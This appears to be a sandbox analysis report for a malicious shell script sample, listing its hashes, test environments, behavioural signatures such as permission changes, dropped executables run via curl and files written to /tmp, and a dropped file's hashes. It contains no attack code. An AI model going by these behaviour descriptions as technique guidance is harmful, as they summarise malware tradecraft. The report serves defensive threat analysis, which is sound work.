Analysis
-
max time kernel
151s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 25 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97